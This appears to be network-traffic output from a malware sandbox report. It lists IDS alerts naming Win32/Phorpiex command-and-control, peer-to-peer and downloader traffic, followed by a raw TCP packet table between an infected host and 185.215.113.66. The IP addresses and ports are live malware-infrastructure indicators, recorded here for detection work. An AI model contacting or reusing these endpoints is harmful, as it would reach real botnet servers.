                                                                                                                                                                                                                                                  2024-12-05T17:34:05.860091+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115003891.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:08.634390+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230731.47.175.3940500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:10.077835+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115004191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:10.077835+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115004191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:13.675559+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307189.173.142.19240500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:15.521961+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150043185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:15.521961+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150043185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:18.713529+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307198.163.204.640500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:19.357396+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150045185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:19.357396+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150045185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:23.229363+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150046185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:23.229363+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150046185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:23.722460+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230785.9.133.20240500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:27.083721+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150048185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:27.083721+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150048185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:28.755066+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230737.21.118.10640500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:30.871341+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150050185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:30.871341+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150050185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:33.775801+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230738.222.194.19040500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:36.240351+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115005291.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:36.240351+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115005291.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:38.819079+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230778.109.103.10340500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:40.418042+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115005491.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:40.418042+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115005491.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:43.846973+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.11623072.133.70.6640500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:44.421681+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115005591.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:44.421681+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115005591.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:48.157586+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115005791.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:48.157586+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115005791.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:48.870685+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.11623075.76.0.20340500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:52.510546+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115005991.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:52.510546+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115005991.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:54.015756+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307109.68.122.1440500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:58.674738+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150061185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:58.674738+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150061185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:02.360041+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150063185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:02.360041+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150063185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:06.198040+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150064185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:06.198040+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150064185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:09.510773+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307189.167.22.3640500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:35:09.837541+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150066185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:09.837541+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150066185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:13.491459+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150068185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:13.491459+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150068185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:18.167455+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115007091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:18.167455+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115007091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:19.548640+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307212.13.170.22340500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:35:21.797150+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115007191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:21.797150+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115007191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:24.568299+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230789.249.62.740500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:35:25.411308+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115007391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:25.411308+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115007391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:29.061048+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115007591.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:29.061048+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115007591.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:32.740048+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115007791.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:32.740048+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115007791.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:34.608881+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230746.248.34.1240500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:35:37.820344+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150078185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:37.820344+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150078185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:41.796669+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150080185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:41.796669+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150080185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:45.373070+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150082185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:45.373070+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150082185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:48.870959+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150084185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:48.870959+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150084185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:49.628423+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.11623072.180.115.7640500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:35:52.381305+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150085185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:52.381305+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150085185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:56.905546+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115008791.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:56.905546+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115008791.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:35:59.643983+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307178.253.102.21440500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:36:00.434999+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115008991.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:36:00.434999+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115008991.202.233.14180TCP
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:38.952404022 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:39.072244883 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:39.076081038 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:39.088346958 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:39.208208084 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.486912966 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.486928940 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.487004042 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.488637924 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.488673925 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.488686085 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.488697052 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.488734007 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490406990 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490442991 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490453959 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490464926 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490499973 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490514994 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.491444111 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.491481066 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.491530895 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.491569042 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.606827021 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.606888056 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.702573061 CET8049710185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.702647924 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:43.601325989 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:43.721729994 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:43.721796036 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:43.727128029 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:43.846833944 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:44.084194899 CET4971080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.063201904 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.063225985 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.063425064 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.064635038 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.064647913 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.064659119 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.064754963 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.064754963 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065449953 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065504074 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065504074 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065515995 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065545082 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065588951 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.069541931 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.069601059 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.069633961 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.069706917 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.183346987 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.183602095 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.183610916 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.183676004 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.187541962 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.187638998 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.190068960 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.190084934 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.190128088 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.190188885 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.256721973 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.256799936 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.256933928 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.257118940 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.261029005 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.261090040 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.261271954 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.261337042 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.269462109 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.269501925 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.269594908 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.277729034 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.277815104 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.277836084 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.277872086 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.286227942 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.286304951 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.286366940 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.295059919 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.295130014 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.295218945 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.295264959 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.303491116 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.303510904 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.303586006 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.312494040 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.312514067 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.312566042 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.312639952 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.320086002 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.320209980 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.320256948 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.320305109 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.328099012 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.328155994 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.328203917 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.328247070 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.335966110 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.339631081 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.426259995 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.426276922 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.426346064 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.426346064 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.430284023 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.430351019 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.451741934 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.451858044 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.451988935 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.452002048 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.452054024 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.452254057 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.452317953 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.455959082 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.456254959 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.456334114 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.460587025 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.460684061 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.460793972 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.460848093 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.465240002 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.465303898 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.465411901 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.465467930 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.469625950 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.469723940 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.469782114 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.469899893 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.474396944 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.474411011 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.474477053 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.478708982 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.478759050 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.478868961 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.479228973 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.483330965 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.483345032 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.483504057 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.489553928 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.489711046 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.489765882 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.492392063 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.492475033 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.492532969 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.492577076 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.496423006 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.496500015 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.496536970 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.496613026 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.500940084 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.501055002 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.501107931 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.501162052 CET4972180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.505547047 CET8049721185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.505610943 CET8049721185.215.113.66192.168.2.11
